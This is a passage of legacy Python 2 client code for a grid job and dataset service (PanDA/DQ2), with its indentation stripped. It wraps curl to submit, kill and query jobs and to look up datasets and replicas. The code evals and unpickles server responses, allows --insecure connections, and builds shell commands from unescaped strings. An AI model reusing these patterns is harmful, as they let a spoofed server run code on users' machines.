com = '%s --silent --get' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# max time of 10 min
com += ' -m 600'
# add rucio account info
if rucioAccount:
if os.environ.has_key('RUCIO_ACCOUNT'):
data['account'] = os.environ['RUCIO_ACCOUNT']
if os.environ.has_key('RUCIO_APPID'):
data['appid'] = os.environ['RUCIO_APPID']
data['client_version'] = '2.4.1'
# data
strData = ''
for key in data.keys():
strData += 'data="%s"\n' % urllib.urlencode({key:data[key]})
# write data to temporary config file
if globalTmpDir != '':
tmpFD,tmpName = tempfile.mkstemp(dir=globalTmpDir)
else:
tmpFD,tmpName = tempfile.mkstemp()
os.write(tmpFD,strData)
os.close(tmpFD)
com += ' --config %s' % tmpName
com += ' %s' % url
# execute
if self.verbose:
print com
print strData[:-1]
s,o = commands.getstatusoutput(com)
if o != '\x00':
try:
tmpout = urllib.unquote_plus(o)
o = eval(tmpout)
except:
pass
ret = (s,o)
# remove temporary file
os.remove(tmpName)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# POST method
def post(self,url,data,rucioAccount=False):
# make command
com = '%s --silent' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# max time of 10 min
com += ' -m 600'
# add rucio account info
if rucioAccount:
if os.environ.has_key('RUCIO_ACCOUNT'):
data['account'] = os.environ['RUCIO_ACCOUNT']
if os.environ.has_key('RUCIO_APPID'):
data['appid'] = os.environ['RUCIO_APPID']
data['client_version'] = '2.4.1'
# data
strData = ''
for key in data.keys():
strData += 'data="%s"\n' % urllib.urlencode({key:data[key]})
# write data to temporary config file
if globalTmpDir != '':
tmpFD,tmpName = tempfile.mkstemp(dir=globalTmpDir)
else:
tmpFD,tmpName = tempfile.mkstemp()
os.write(tmpFD,strData)
os.close(tmpFD)
com += ' --config %s' % tmpName
com += ' %s' % url
# execute
if self.verbose:
print com
print strData[:-1]
s,o = commands.getstatusoutput(com)
if o != '\x00':
try:
tmpout = urllib.unquote_plus(o)
o = eval(tmpout)
except:
pass
ret = (s,o)
# remove temporary file
os.remove(tmpName)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# PUT method
def put(self,url,data):
# make command
com = '%s --silent' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# emulate PUT
for key in data.keys():
com += ' -F "%s=@%s"' % (key,data[key])
com += ' %s' % url
if self.verbose:
print com
# execute
ret = commands.getstatusoutput(com)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# convert return
def convRet(self,ret):
if ret[0] != 0:
ret = (ret[0]%255,ret[1])
# add messages to silent errors
if ret[0] == 35:
ret = (ret[0],'SSL connect error. The SSL handshaking failed. Check grid certificate/proxy.')
elif ret[0] == 7:
ret = (ret[0],'Failed to connect to host.')
elif ret[0] == 55:
ret = (ret[0],'Failed sending network data.')
elif ret[0] == 56:
ret = (ret[0],'Failure in receiving network data.')
return ret
'''
public methods
'''
# get site specs
def getSiteSpecs(siteType=None):
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getSiteSpecs'
data = {}
if siteType != None:
data['siteType'] = siteType
status,output = curl.get(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getSiteSpecs : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get cloud specs
def getCloudSpecs():
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getCloudSpecs'
status,output = curl.get(url,{})
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getCloudSpecs : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# refresh specs at runtime
def refreshSpecs():
global PandaSites
global PandaClouds
# get Panda Sites
tmpStat,PandaSites = getSiteSpecs()
if tmpStat != 0:
print "ERROR : cannot get Panda Sites"
sys.exit(EC_Failed)
for id, val in PandaSites.iteritems():
if 'setokens' not in val:
if 'setokens_output' in val:
val['setokens'] = val['setokens_output']
else:
val['setokens'] = {}
# get cloud info
tmpStat,PandaClouds = getCloudSpecs()
if tmpStat != 0:
print "ERROR : cannot get Panda Clouds"
sys.exit(EC_Failed)
# initialize specs
refreshSpecs()
# get LRC
def getLRC(site):
ret = None
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['dq2url'] in [None,"","None"]:
ret = val['dq2url']
break
return ret
# get LFC
def getLFC(site):
ret = None
# use explicit matching for sitename
if PandaSites.has_key(site):
val = PandaSites[site]
if not val['lfchost'] in [None,"","None"]:
ret = val['lfchost']
return ret
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['lfchost'] in [None,"","None"]:
ret = val['lfchost']
break
return ret
# get SEs
def getSE(site):
ret = []
# use explicit matching for sitename
if PandaSites.has_key(site):
val = PandaSites[site]
if not val['se'] in [None,"","None"]:
for tmpSE in val['se'].split(','):
match = re.search('.+://([^:/]+):*\d*/*',tmpSE)
if match != None:
ret.append(match.group(1))
return ret
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['se'] in [None,"","None"]:
for tmpSE in val['se'].split(','):
match = re.search('.+://([^:/]+):*\d*/*',tmpSE)
if match != None:
ret.append(match.group(1))
break
# return
return ret
# convert DQ2 ID to Panda siteid
def convertDQ2toPandaID(site, getAll=False):
keptSite = ''
siteList = []
for tmpID,tmpSpec in PandaSites.iteritems():
        # exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# use Panda sitename
if convSrmV2ID(site) in srmv2ddmList:
keptSite = tmpID
# keep non-online site just in case
if tmpSpec['status']=='online':
if not getAll:
return keptSite
siteList.append(keptSite)
if getAll:
return ','.join(siteList)
return keptSite
# convert DQ2 ID to Panda site IDs
def convertDQ2toPandaIDList(site):
sites = []
sitesOff = []
for tmpID,tmpSpec in PandaSites.iteritems():
        # exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# use Panda sitename
if convSrmV2ID(site) in srmv2ddmList:
# append
if tmpSpec['status']=='online':
if not tmpID in sites:
sites.append(tmpID)
else:
# keep non-online site just in case
if not tmpID in sitesOff:
sitesOff.append(tmpID)
# return
if sites != []:
return sites
return sitesOff
# convert to long queue
def convertToLong(site):
tmpsite = re.sub('ANALY_','ANALY_LONG_',site)
tmpsite = re.sub('_\d+$','',tmpsite)
# if sitename exists
if PandaSites.has_key(tmpsite):
site = tmpsite
return site
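# Worked example for convertToLong (the site name is hypothetical): the two
# substitutions insert LONG_ and drop a trailing numeric suffix, so
#   'ANALY_ABC_9' -> 'ANALY_LONG_ABC'
# and the original name is returned unchanged when the long queue is not in PandaSites.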
# submit jobs
def submitJobs(jobs,verbose=False):
# set hostname
hostname = commands.getoutput('hostname')
for job in jobs:
job.creationHost = hostname
# serialize
strJobs = pickle.dumps(jobs)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/submitJobs'
data = {'jobs':strJobs}
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR submitJobs : %s %s" % (type,value)
return EC_Failed,None
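# Minimal usage sketch for submitJobs (assumes jobList holds JobSpec objects
# built elsewhere; not executed here):
#
#   status,ret = submitJobs(jobList,verbose=True)
#   if status == 0:
#       # ret is the unpickled server response with one entry per job
#       print ret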
# get job status
def getJobStatus(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getJobStatus'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJobStatus : %s %s" % (type,value)
return EC_Failed,None
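# Usage sketch for getJobStatus (the PandaIDs and attribute names follow the
# usual JobSpec convention and are assumptions here):
#
#   status,jobSpecs = getJobStatus([1234,5678])
#   if status == 0:
#       for tmpJob in jobSpecs:
#           print tmpJob.PandaID,tmpJob.jobStatus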
# kill jobs
def killJobs(ids,verbose=False):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/killJobs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR killJobs : %s %s" % (type,value)
return EC_Failed,None
# kill task
def killTask(jediTaskID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/killTask'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR killTask : %s %s" % (type,value)
return EC_Failed,None
# finish task
def finishTask(jediTaskID,soft=False,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/finishTask'
data = {'jediTaskID':jediTaskID}
if soft:
data['soft'] = True
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR finishTask : %s %s" % (type,value)
return EC_Failed,None
# retry task
def retryTask(jediTaskID,verbose=False,properErrorCode=False,newParams=None):
if newParams == None:
newParams = {}
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/retryTask'
data = {'jediTaskID':jediTaskID,
'properErrorCode':properErrorCode}
if newParams != {}:
data['newParams'] = json.dumps(newParams)
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR retryTask : %s %s" % (type,value)
return EC_Failed,None
# reassign jobs
def reassignJobs(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
# execute
url = baseURLSSL + '/reassignJobs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR reassignJobs : %s %s" % (type,value)
return EC_Failed,None
# query PandaIDs
def queryPandaIDs(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/queryPandaIDs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR queryPandaIDs : %s %s" % (type,value)
return EC_Failed,None
# query last files in datasets
def queryLastFilesInDataset(datasets,verbose=False):
# serialize
strDSs = pickle.dumps(datasets)
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/queryLastFilesInDataset'
data = {'datasets':strDSs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR queryLastFilesInDataset : %s %s" % (type,value)
return EC_Failed,None
# put file
def putFile(file,verbose=False,useCacheSrv=False,reuseSandbox=False):
# size check for noBuild
sizeLimit = 10*1024*1024
fileSize = os.stat(file)[stat.ST_SIZE]
if not os.path.basename(file).startswith('sources.'):
if fileSize > sizeLimit:
errStr = 'Exceeded size limit (%sB > %sB). ' % (fileSize,sizeLimit)
errStr += 'Your working directory contains files which are too large to be put on the cache area. '
errStr += 'Please submit the job without --noBuild/--libDS so that your files are uploaded to the SE'
# get logger
tmpLog = PLogger.getPandaLogger()
tmpLog.error(errStr)
return EC_Failed,'False'
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# check duplication
if reuseSandbox:
# get CRC
fo = open(file)
fileContent = fo.read()
fo.close()
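# the sandbox is assumed to be a gzip-compressed archive: the last 8 bytes
# of a gzip stream hold the CRC-32 and the uncompressed size (ISIZE) as two
# 32-bit unsigned integers, which serve as a cheap duplicate-detection key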
footer = fileContent[-8:]
checkSum,isize = struct.unpack("II",footer)
# check duplication
url = baseURLSSL + '/checkSandboxFile'
data = {'fileSize':fileSize,'checkSum':checkSum}
status,output = curl.post(url,data)
if status != 0:
return EC_Failed,'ERROR: Could not check Sandbox duplication with %s' % status
elif output.startswith('FOUND:'):
# found reusable sandbox
hostName,reuseFileName = output.split(':')[1:]
# set cache server hostname
global baseURLCSRVSSL
baseURLCSRVSSL = "https://%s:25443/server/panda" % hostName
# return reusable filename
return 0,"NewFileName:%s" % reuseFileName
# execute
if useCacheSrv:
url = baseURLCSRVSSL + '/putFile'
else:
url = baseURLSSL + '/putFile'
data = {'file':file}
return curl.put(url,data)
# delete file
def deleteFile(file):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
# execute
url = baseURLSSL + '/deleteFile'
data = {'file':file}
return curl.post(url,data)
# check dataset in map by ignoring case sensitivity
def checkDatasetInMap(name,outMap):
try:
for tmpKey in outMap.keys():
if name.upper() == tmpKey.upper():
return True
except:
pass
return False
# get real dataset name from map by ignoring case sensitivity
def getDatasetValueInMap(name,outMap):
for tmpKey in outMap.keys():
if name.upper() == tmpKey.upper():
return tmpKey
# return original name
return name
# query files in dataset
def queryFilesInDataset(name,verbose=False,v_vuids=None,getDsString=False,dsStringOnly=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# for container failure
status,out = 0,''
nameVuidsMap = {}
dsString = ''
try:
errStr = ''
# get VUID
if v_vuids == None:
url = baseURLDQ2 + '/ws_repository/rpc'
if re.search(',',name) != None:
# comma-separated list
names = name.split(',')
else:
# single dataset or container name
names = [name]
# loop over all names
vuidList = []
iLookUp = 0
for tmpName in names:
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
data = {'operation':'queryDatasetByName','dsn':tmpName,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or out == '\x00' or (re.search('\*',tmpName) == None and not checkDatasetInMap(tmpName,out)):
errStr = "ERROR : could not find %s in DQ2 DB. Check if the dataset name is correct" \
% tmpName
sys.exit(EC_Failed)
# parse
if re.search('\*',tmpName) == None:
# get real dataset name
tmpName = getDatasetValueInMap(tmpName,out)
vuidList.append(out[tmpName]['vuids'])
# mapping between name and vuids
nameVuidsMap[tuple(out[tmpName]['vuids'])] = tmpName
# string to expand wildcard
dsString += '%s,' % tmpName
else:
# using wildcard
for outKeyName in out.keys():
# skip sub/dis
if re.search('_dis\d+$',outKeyName) != None or re.search('_sub\d+$',outKeyName) != None:
continue
# append
vuidList.append(out[outKeyName]['vuids'])
# mapping between name and vuids
nameVuidsMap[tuple(out[outKeyName]['vuids'])] = outKeyName
# string to expand wildcard
dsString += '%s,' % outKeyName
else:
vuidList = [v_vuids]
if dsStringOnly:
return dsString[:-1]
# reset for backward compatibility when * or , is not used
if re.search('\*',name) == None and re.search(',',name) == None:
nameVuidsMap = {}
dsString = ''
# get files
url = baseURLDQ2 + '/ws_content/rpc'
ret = {}
generalLFNmap = {}
iLookUp = 0
for vuids in vuidList:
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
data = {'operation': 'queryFilesInDataset','vuids':vuids,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not get files in %s" % name
sys.exit(EC_Failed)
# parse
if out == '\x00' or len(out) < 2 or out==():
# empty
continue
for guid,vals in out[0].iteritems():
# remove attemptNr
generalLFN = re.sub('\.\d+$','',vals['lfn'])
# choose greater attempt to avoid duplication
if generalLFNmap.has_key(generalLFN):
if vals['lfn'] > generalLFNmap[generalLFN]:
# remove lesser attempt
del ret[generalLFNmap[generalLFN]]
else:
continue
# append to map
generalLFNmap[generalLFN] = vals['lfn']
ret[vals['lfn']] = {'guid' : guid,
'fsize' : vals['filesize'],
'md5sum' : vals['checksum'],
'scope' : vals['scope']}
# add dataset name
if nameVuidsMap.has_key(tuple(vuids)):
ret[vals['lfn']]['dataset'] = nameVuidsMap[tuple(vuids)]
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
if getDsString:
return ret,dsString[:-1]
return ret
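# Return-value sketch for queryFilesInDataset (values are illustrative):
#
#   {'somefile.pool.root.1': {'guid'   : 'A1B2C3D4-...',
#                             'fsize'  : 123456789,
#                             'md5sum' : 'ad:0123...',
#                             'scope'  : 'mc12_8TeV',
#                             'dataset': 'mc12_8TeV.12345.somedataset'}}
#
# 'dataset' is filled only for wildcard or comma-separated lookups, since
# nameVuidsMap is reset otherwise for backward compatibility.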
# get datasets
def getDatasets(name,verbose=False,withWC=False,onlyNames=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
if onlyNames:
data['API'] = '30'
data['onlyNames'] = int(onlyNames)
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server"
sys.exit(EC_Failed)
# parse
datasets = {}
if out == '\x00' or ((not withWC) and (not checkDatasetInMap(name,out))):
# no datasets
return datasets
# check format and return names only when requested
if isinstance(out,types.DictionaryType):
if onlyNames:
return out
else:
# wrong format
errStr = "ERROR : DQ2 didn't give a dictionary for %s" % name
sys.exit(EC_Failed)
# get VUIDs
for dsname,idMap in out.iteritems():
# check format
if idMap.has_key('vuids') and len(idMap['vuids'])>0:
datasets[dsname] = idMap['vuids'][0]
else:
# wrong format
errStr = "ERROR : could not parse HTTP response for %s" % name
sys.exit(EC_Failed)
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
return datasets
# disable expiring file check
globalUseShortLivedReplicas = False
def useExpiringFiles():
global globalUseShortLivedReplicas
globalUseShortLivedReplicas = True
# get expiring files
globalCompleteDsMap = {}
globalExpFilesMap = {}
globalExpOkFilesMap = {}
globalExpCompDq2FilesMap = {}
def getExpiringFiles(dsStr,removedDS,siteID,verbose,getOKfiles=False):
# convert * in dsStr
if re.search('\*',dsStr) != None:
dsStr = queryFilesInDataset(dsStr,verbose,dsStringOnly=True)
# reuse map
global globalExpFilesMap
global globalExpOkFilesMap
global globalExpCompDq2FilesMap
global globalUseShortLivedReplicas
mapKey = (dsStr,siteID)
if globalExpFilesMap.has_key(mapKey):
if getOKfiles:
return globalExpFilesMap[mapKey],globalExpOkFilesMap[mapKey],globalExpCompDq2FilesMap[mapKey]
return globalExpFilesMap[mapKey]
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug("checking metadata for %s, removed=%s " % (dsStr,str(removedDS)))
# get DQ2 location and used data
tmpLocations,dsUsedDsMap = getLocations(dsStr,[],'',False,verbose,getDQ2IDs=True,
removedDatasets=removedDS,
useOutContainer=True,
includeIncomplete=True,
notSiteStatusCheck=True)
# get all sites matching with site's DQ2ID here, to work with brokeroff sites
fullSiteList = convertDQ2toPandaIDList(PandaSites[siteID]['ddm'])
# get datasets at the site
datasets = []
for tmpDsUsedDsMapKey,tmpDsUsedDsVal in dsUsedDsMap.iteritems():
siteMatched = False
for tmpTargetID in fullSiteList:
# check with short/long siteID
if tmpDsUsedDsMapKey in [tmpTargetID,convertToLong(tmpTargetID)]:
datasets = tmpDsUsedDsVal
siteMatched = True
break
if siteMatched:
break
# not found
if datasets == []:
tmpLog.error("cannot find datasets at %s for replica metadata check" % siteID)
sys.exit(EC_Failed)
# loop over all datasets
convertedOrigSite = convSrmV2ID(PandaSites[siteID]['ddm'])
expFilesMap = {'datasets':[],'files':[]}
expOkFilesList = []
expCompDq2FilesList = []
for dsName in datasets:
# get DQ2 IDs for the siteID
dq2Locations = []
if tmpLocations.has_key(dsName):
for tmpLoc in tmpLocations[dsName]:
# check Panda site IDs
for tmpPandaSiteID in convertDQ2toPandaIDList(tmpLoc):
if tmpPandaSiteID in fullSiteList:
if not tmpLoc in dq2Locations:
dq2Locations.append(tmpLoc)
break
# check prefix mainly for MWT2 and MWT2_UC
convertedScannedID = convSrmV2ID(tmpLoc)
if convertedOrigSite.startswith(convertedScannedID) or \
convertedScannedID.startswith(convertedOrigSite):
if not tmpLoc in dq2Locations:
dq2Locations.append(tmpLoc)
# empty
if dq2Locations == []:
tmpLog.error("cannot find replica locations for %s:%s to check metadata" % (siteID,dsName))
sys.exit(EC_Failed)
# check completeness
compInDQ2 = False
global globalCompleteDsMap
if globalCompleteDsMap.has_key(dsName):
for tmpDQ2Loc in dq2Locations:
if tmpDQ2Loc in globalCompleteDsMap[dsName]:
compInDQ2 = True
break
# get metadata
metaList = getReplicaMetadata(dsName,dq2Locations,verbose)
# check metadata
metaOK = False
for metaItem in metaList:
# replica deleted
if isinstance(metaItem,types.StringType) and "No replica found at the location" in metaItem:
continue
if not globalUseShortLivedReplicas:
# check the archived attribute
if isinstance(metaItem['archived'],types.StringType) and metaItem['archived'].lower() in ['tobedeleted',]:
continue
# check replica lifetime
if metaItem.has_key('expirationdate') and isinstance(metaItem['expirationdate'],types.StringType):
try:
import datetime
expireDate = datetime.datetime.strptime(metaItem['expirationdate'],'%Y-%m-%d %H:%M:%S')
# expire in 7 days
if expireDate-datetime.datetime.utcnow() < datetime.timedelta(days=7):
continue
except:
pass
# all OK
metaOK = True
break
# expiring
if not metaOK:
# get files
expFilesMap['datasets'].append(dsName)
expFilesMap['files'] += queryFilesInDataset(dsName,verbose)
else:
tmpFilesList = queryFilesInDataset(dsName,verbose)
expOkFilesList += tmpFilesList
# complete
if compInDQ2:
expCompDq2FilesList += tmpFilesList
# keep to avoid redundant lookup
globalExpFilesMap[mapKey] = expFilesMap
globalExpOkFilesMap[mapKey] = expOkFilesList
globalExpCompDq2FilesMap[mapKey] = expCompDq2FilesList
if expFilesMap['datasets'] != []:
msgStr = 'ignore replicas of '
for tmpDsStr in expFilesMap['datasets']:
msgStr += '%s,' % tmpDsStr
msgStr = msgStr[:-1]
msgStr += ' at %s due to archived=ToBeDeleted or short lifetime < 7 days. ' % siteID
msgStr += 'If you want to use those replicas in spite of short lifetime, use --useShortLivedReplicas'
tmpLog.info(msgStr)
# return
if getOKfiles:
return expFilesMap,expOkFilesList,expCompDq2FilesList
return expFilesMap
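# Return-value sketch: expFilesMap is {'datasets':[...],'files':[...]} with
# the expiring replicas; with getOKfiles=True the non-expiring files and the
# files in DQ2-complete replicas are returned as two additional lists.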
# get replica metadata
def getReplicaMetadata(name,dq2Locations,verbose):
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug("getReplicaMetadata for %s" % (name))
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server"
sys.exit(EC_Failed)
# parse
datasets = {}
if out == '\x00' or not checkDatasetInMap(name,out):
errStr = "ERROR : VUID for %s was not found in DQ2" % name
sys.exit(EC_Failed)
# get VUIDs
vuid = out[name]['vuids'][0]
# get replica metadata
retList = []
for location in dq2Locations:
url = baseURLDQ2 + '/ws_location/rpc'
data = {'operation':'queryDatasetReplicaMetadata','vuid':vuid,
'location':location,'API':'0_3_0',
'tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server to get replica metadata"
sys.exit(EC_Failed)
# append
retList.append(out)
# return
return retList
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# query files in shadow datasets associated to container
def getFilesInShadowDataset(contName,suffixShadow,verbose=False):
fileList = []
# query files in PandaDB first to get running/failed files + files which are being added
tmpList = getFilesInUseForAnal(contName,verbose)
for tmpItem in tmpList:
if not tmpItem in fileList:
# append
fileList.append(tmpItem)
# get elements in container
elements = getElementsFromContainer(contName,verbose)
for tmpEle in elements:
# remove merge
tmpEle = re.sub('\.merge$','',tmpEle)
shadowDsName = "%s%s" % (tmpEle,suffixShadow)
# check existence
tmpDatasets = getDatasets(shadowDsName,verbose)
if len(tmpDatasets) == 0:
continue
# get files in shadow dataset
tmpList = queryFilesInDataset(shadowDsName,verbose)
for tmpItem in tmpList:
if not tmpItem in fileList:
# append
fileList.append(tmpItem)
return fileList
# query files in shadow dataset associated to old dataset
def getFilesInShadowDatasetOld(outDS,suffixShadow,verbose=False):
shadowList = []
# query files in PandaDB first to get running/failed files + files which are being added
tmpShadowList = getFilesInUseForAnal(outDS,verbose)
for tmpItem in tmpShadowList:
shadowList.append(tmpItem)
# query files in shadow dataset
for tmpItem in queryFilesInDataset("%s%s" % (outDS,suffixShadow),verbose):
if not tmpItem in shadowList:
shadowList.append(tmpItem)
return shadowList
# list datasets by GUIDs
def listDatasetsByGUIDs(guids,dsFilter,verbose=False,forColl=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# get filter
dsFilters = []
if dsFilter != '':
dsFilters = dsFilter.split(',')
# get logger
tmpLog = PLogger.getPandaLogger()
retMap = {}
allMap = {}
iLookUp = 0
guidLfnMap = {}
checkedDSList = []
# loop over all GUIDs
for guid in guids:
# check existing map to avoid redundant lookups
if guidLfnMap.has_key(guid):
retMap[guid] = guidLfnMap[guid]
continue
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
# get vuids
url = baseURLDQ2 + '/ws_content/rpc'
data = {'operation': 'queryDatasetsWithFileByGUID','guid':guid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
# failed
if status != 0:
if not verbose:
print status,out
errStr = "could not get dataset vuids for %s" % guid
tmpLog.error(errStr)
sys.exit(EC_Failed)
# GUID was not registered in DQ2
if out == '\x00' or out == ():
if verbose:
errStr = "DQ2 gave an empty list for GUID=%s" % guid
tmpLog.debug(errStr)
allMap[guid] = []
continue
tmpVUIDs = list(out)
# get dataset name
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByVUIDs','vuids':tmpVUIDs,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
# failed
if status != 0:
if not verbose:
print status,out
errStr = "could not get dataset name for %s" % guid
tmpLog.error(errStr)
sys.exit(EC_Failed)
# empty
if out == '\x00':
errStr = "DQ2 gave an empty list for VUID=%s" % tmpVUIDs
tmpLog.error(errStr)
sys.exit(EC_Failed)
# datasets are deleted
if out == {}:
allMap[guid] = []
continue
# check with filter
tmpDsNames = []
tmpAllDsNames = []
for tmpDsName in out.keys():
# ignore junk datasets
if tmpDsName.startswith('panda') or \
tmpDsName.startswith('user') or \
tmpDsName.startswith('group') or \
re.search('_sub\d+$',tmpDsName) != None or \
re.search('_dis\d+$',tmpDsName) != None or \
re.search('_shadow$',tmpDsName) != None:
continue
tmpAllDsNames.append(tmpDsName)
# check with filter
if dsFilters != []:
flagMatch = False
for tmpFilter in dsFilters:
# replace . to \.
tmpFilter = tmpFilter.replace('.','\.')
# replace * to .*
tmpFilter = tmpFilter.replace('*','.*')
if re.search('^'+tmpFilter,tmpDsName) != None:
flagMatch = True
break
# not match
if not flagMatch:
continue
# append
tmpDsNames.append(tmpDsName)
# empty
if tmpDsNames == []:
# there may be multiple GUIDs for the same event, and some may be filtered by --eventPickDS
allMap[guid] = tmpAllDsNames
continue
# duplicated
if len(tmpDsNames) != 1:
if not forColl:
errStr = "there are multiple datasets %s for GUID:%s. Please set --eventPickDS and/or --eventPickStreamName to choose one dataset"\
% (str(tmpAllDsNames),guid)
else:
errStr = "there are multiple datasets %s for GUID:%s. Please set --eventPickDS to choose one dataset"\
% (str(tmpAllDsNames),guid)
tmpLog.error(errStr)
sys.exit(EC_Failed)
# get LFN
if not tmpDsNames[0] in checkedDSList:
tmpMap = queryFilesInDataset(tmpDsNames[0],verbose)
for tmpLFN,tmpVal in tmpMap.iteritems():
guidLfnMap[tmpVal['guid']] = (tmpDsNames[0],tmpLFN)
checkedDSList.append(tmpDsNames[0])
# append
if not guidLfnMap.has_key(guid):
errStr = "LFN for %s in not found in %s" % (guid,tmpDsNames[0])
tmpLog.error(errStr)
